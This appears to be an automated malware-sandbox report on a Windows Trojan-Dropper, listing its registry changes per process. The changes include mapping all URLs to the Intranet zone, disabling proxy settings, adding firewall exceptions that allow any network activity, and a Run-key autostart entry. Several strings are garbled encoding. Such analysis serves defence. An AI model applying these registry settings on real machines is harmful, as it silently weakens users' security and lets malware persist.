[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 15 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014060120140602]
"CachePrefix" = ":2014060120140602:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BLOCK_LMZ_SCRIPT]
"shandian.exe" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014060120140602]
"CachePath" = "%USERPROFILE%\Local Settings\History\History.IE5\MSHist012014060120140602\"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "shandian.exe"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE]
"shandian.exe" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1301653454"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A5 A8 D6 66 49 C8 BA D5 9F 3D 00 6E 50 3B E5 AE"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014060120140602]
"CacheRepair" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Favorites" = "%Documents and Settings%\%current user%\Favorites"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014060120140602]
"CacheOptions" = "11"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan-Dropper modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan-Dropper modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan-Dropper modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan-Dropper deletes the following registry key(s):

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012013021120130212]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012013021520130216]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012013021320130214]

The Trojan-Dropper deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process emaaif_70690.exe:2652 makes changes in the system registry.
The Trojan-Dropper creates and/or sets the following values in system registry:

[HKCR\metnsd\clsid]
"SequenceID" = "4A DB BE EF A4 6E D0 4A 9F DD 6C 31 0E 72 7D C3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsl9.tmp]
"g.exe" = "g"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "51 9B 30 C0 D9 2C FC 7E 8C C0 6F 0A 59 9D 6E 87"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

The Trojan-Dropper modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan-Dropper modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\Local Settings\Temp\nsf2.tmp]
"emaaif_70690.exe" = "%Documents and Settings%\%current user%\Local Settings\Temp\nsf2.tmp\emaaif_70690.exe:*:Enabled:Ã§â„¢Â¾Ã¥ÂºÂ¦Ã¥ÂÂ«Ã¥Â£Â«Ã¥Å“Â¨Ã§ÂºÂ¿Ã¥Â®â€°Ã¨Â£â€¦Ã§Â¨â€¹Ã¥ÂºÂ"

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\Local Settings\Temp\nsl9.tmp]
"g.exe" = "%Documents and Settings%\%current user%\Local Settings\Temp\nsl9.tmp\g.exe:*:Enabled:Ã§â„¢Â¾Ã¥ÂºÂ¦Ã¥ÂÂ«Ã¥Â£Â«Ã¥Â®â€°Ã¨Â£â€¦Ã§Â¨â€¹Ã¥ÂºÂ"

The Trojan-Dropper modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan-Dropper adds process executable file it works in to the list of trusted Windows Firewall applications:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\Local Settings\Temp\nsl9.tmp]
"g.exe" = "%Documents and Settings%\%current user%\Local Settings\Temp\nsl9.tmp\g.exe:*:Enabled:Ã§â„¢Â¾Ã¥ÂºÂ¦Ã¥ÂÂ«Ã¥Â£Â«Ã¥Â®â€°Ã¨Â£â€¦Ã§Â¨â€¹Ã¥ÂºÂ"

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\Local Settings\Temp\nsf2.tmp]
"emaaif_70690.exe" = "%Documents and Settings%\%current user%\Local Settings\Temp\nsf2.tmp\emaaif_70690.exe:*:Enabled:Ã§â„¢Â¾Ã¥ÂºÂ¦Ã¥ÂÂ«Ã¥Â£Â«Ã¥Å“Â¨Ã§ÂºÂ¿Ã¥Â®â€°Ã¨Â£â€¦Ã§Â¨â€¹Ã¥ÂºÂ"

The process sdad.exe:1628 makes changes in the system registry.
The Trojan-Dropper creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "sdad.exe"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 16 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1384939658"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "04 60 CE 2A D4 D1 EC AB 6B AF 81 B6 5B A6 08 A2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan-Dropper modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan-Dropper modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan-Dropper modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan-Dropper deletes the following registry key(s):

[HKCU\Software\Microsoft\MediaPlayer\Health\{9E4977DA-E7AA-4E96-85E7-F424F4317272}]

The Trojan-Dropper deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:464 makes changes in the system registry.
The Trojan-Dropper creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ãƒâ€°ÃƒÂÃ‚ÂµÃƒÂ§ÃƒÂ¤Ã‚Â¯Ãƒâ‚¬Ãƒâ‚¬Ãƒâ€ ÃƒÂ·]
"DisplayName" = "Ãƒâ€°ÃƒÂÃ‚ÂµÃƒÂ§ÃƒÂ¤Ã‚Â¯Ãƒâ‚¬Ãƒâ‚¬Ãƒâ€ ÃƒÂ·"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 13 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf2.tmp\config.ini\..]
"F30241_s_0523.exe" = "Ã§â„¢Â¾Ã¥ÂºÂ¦Ã¦Ââ‚¬Ã¦Â¯â€™Ã¥Â®â€°Ã¨Â£â€¦Ã§Â¨â€¹Ã¥ÂºÂ"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ãƒâ€°ÃƒÂÃ‚ÂµÃƒÂ§ÃƒÂ¤Ã‚Â¯Ãƒâ‚¬Ãƒâ‚¬Ãƒâ€ ÃƒÂ·]
"Publisher" = "Ãƒâ€°ÃƒÂÃ‚ÂµÃƒÂ§"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ãƒâ€°ÃƒÂÃ‚ÂµÃƒÂ§ÃƒÂ¤Ã‚Â¯Ãƒâ‚¬Ãƒâ‚¬Ãƒâ€ ÃƒÂ·]
"URLInfoAbout" = "http://www.sd.com"
"DisplayIcon" = "%Program Files%\shandian\shandian.exe"

"UninstallString" = "%Program Files%\shandian\uninst.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ãƒâ€°ÃƒÂÃ‚ÂµÃƒÂ§ÃƒÂ¤Ã‚Â¯Ãƒâ‚¬Ãƒâ‚¬Ãƒâ€ ÃƒÂ·]
"DisplayVersion" = "1.0.0.0"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf2.tmp\config.ini\..]
"emaaif_70690.exe" = "emaaif_70690"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "89 01 60 EF 3E 84 DC 28 36 20 00 5C 7D 02 57 46"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\shandian]
"home.bat" = "home"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan-Dropper modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan-Dropper modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

To automatically run itself each time Windows is booted, the Trojan-Dropper adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"shandian" = "%Program Files%\shandian\shandian.exe"

The Trojan-Dropper modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan-Dropper deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process F30241_s_0523.exe:1072 makes changes in the system registry.
The Trojan-Dropper creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Baidu\BaiduSd]
"InstallDate" = "2014-6-1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ã§â„¢Â¾Ã¥ÂºÂ¦Ã¦Ââ‚¬Ã¦Â¯â€™]
"UninstallString" = "%Program Files%\Baidu\BaiduSd\1.8.0.1255\uninst.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCR\CLSID\{36E6A19A-6C8C-4250-B42A-24B8D3514ABA}\VersionIndependentProgID]
"(Default)" = "ieCommonPlugin.Implement"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ã§â„¢Â¾Ã¥ÂºÂ¦Ã¦Ââ‚¬Ã¦Â¯â€™]
"DisplayVersion" = "1.8.0.1255"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{36E6A19A-6C8C-4250-B42A-24B8D3514ABA}\iexplore\AllowedDomains\*]
"(Default)" = ""

[HKLM\SOFTWARE\MozillaPlugins\@baidu.com/BaidusdDetectNPPlugin]
"vendor" = "Beijing baidu Netcom science and technology co.ltd"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\System\CurrentControlSet\Services\bd0003]
"Description" = "Ã§â„¢Â¾Ã¥ÂºÂ¦Ã¦Ââ‚¬Ã¦Â¯â€™Ã¥Å Å¸Ã¨Æ’Â½Ã§Â»â€žÃ¤Â»Â¶"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ã§â„¢Â¾Ã¥ÂºÂ¦Ã¦Ââ‚¬Ã¦Â¯â€™]
"Publisher" = "Ã§â„¢Â¾Ã¥ÂºÂ¦Ã¥Å“Â¨Ã§ÂºÂ¿Ã§Â½â€˜Ã§Â»Å“Ã¦Å â‚¬Ã¦Å“Â¯Ã¯Â¼Ë†Ã¥Å’â€”Ã¤ÂºÂ¬Ã¯Â¼â€°Ã¦Å“â€°Ã©â„¢ÂÃ¥â€¦Â¬Ã¥ÂÂ¸"

[HKLM\System\CurrentControlSet\Services\bd0001]
"Type" = "1"

[HKLM\System\CurrentControlSet\Services\bd0002]
"Tag" = "2"

[HKLM\System\CurrentControlSet\Services\bd0003\Instances\bd0003 Instance]
"Altitude" = "326912"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\System\CurrentControlSet\Services\BDArKit]
"Tag" = "4"

[HKLM\System\CurrentControlSet\Control\CrashControl]
"CrashDumpEnabled" = "2"

[HKCR\TypeLib\{9A93865B-4314-47AE-8C4A-850748CCC6BF}\1.0\0\win32]
"(Default)" = "%Program Files%\Baidu\BaiduSd\1.8.0.1255\explugin\ieBaiduSDDetectPlug.dll"

[HKLM\System\CurrentControlSet\Services\bd0002]
"InstallDir_sd" = "%Program Files%\Baidu\BaiduSd\1.8.0.1255"

[HKCR\CLSID\{36E6A19A-6C8C-4250-B42A-24B8D3514ABA}\TypeLib]
"(Default)" = "{9A93865B-4314-47AE-8C4A-850748CCC6BF}"

[HKCR\TypeLib\{9A93865B-4314-47AE-8C4A-850748CCC6BF}\1.0]
"(Default)" = "ieCommonPlugin 1.0 Type Library"

[HKLM\System\CurrentControlSet\Services\bd0003]
"Group" = "FSFilter Anti-Virus"

[HKLM\System\CurrentControlSet\Services\BDArKit]
"Description" = "BDArKit"

[HKLM\SOFTWARE\Baidu\BaiduSd]
"Version" = "1.8.0.1255"

[HKLM\System\CurrentControlSet\Services\bd0002]
"Type" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCR\TypeLib\{9A93865B-4314-47AE-8C4A-850748CCC6BF}\1.0\FLAGS]
"(Default)" = "0"

[HKLM\SOFTWARE\MozillaPlugins\@baidu.com/BaidusdDetectNPPlugin\MimeTypes\application/np-BaiduSDDetect]
"Description" = "BaidusdDetectNPPlugin"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKLM\System\CurrentControlSet\Services\bd0003\Instances]
"DefaultInstance" = "bd0003 Instance"

[HKCR\ieCommonPlugin.Implement\CurVer]
"(Default)" = "ieCommonPlugin.Implement.1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKCR\ieCommonPlugin.Implement\CLSID]
"(Default)" = "{36E6A19A-6C8C-4250-B42A-24B8D3514ABA}"

[HKLM\SOFTWARE\Baidu\BaiduSd]
"InstallDir" = "%Program Files%\Baidu\BaiduSd"

[HKCR\AppID\{6B4447CA-C33E-4E65-914D-C7B346D73F80}]
"(Default)" = "ieCommonPlugin"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "11 FB 68 EB 2A 4D B4 90 55 DC A3 6C 75 CD C7 08"

[HKLM\System\CurrentControlSet\Services\bd0001]
"DisplayName" = "bd0001"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\System\CurrentControlSet\Services\bd0003]
"DependOnService" = "FltMgr"

[HKLM\System\CurrentControlSet\Services\BDArKit]
"ErrorControl" = "0"

[HKCR\CLSID\{36E6A19A-6C8C-4250-B42A-24B8D3514ABA}\InprocServer32]
"(Default)" = "%Program Files%\Baidu\BaiduSd\1.8.0.1255\explugin\ieBaiduSDDetectPlug.dll"

[HKCR\Interface\{C7777CD6-0F43-49E4-B988-F62E3BA5130A}\TypeLib]
"Version" = "1.0"

[HKLM\System\CurrentControlSet\Services\BDArKit]
"Group" = "bddriver"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\System\CurrentControlSet\Services\BDArKit]
"ImagePath" = "system32\DRIVERS\BDArKit.sys"
"DisplayName" = "BDArKit"

[HKLM\System\CurrentControlSet\Services\bd0003]
"ImagePath" = "system32\DRIVERS\bd0003.sys"

[HKLM\System\CurrentControlSet\Services\bd0001]
"Tag" = "1"

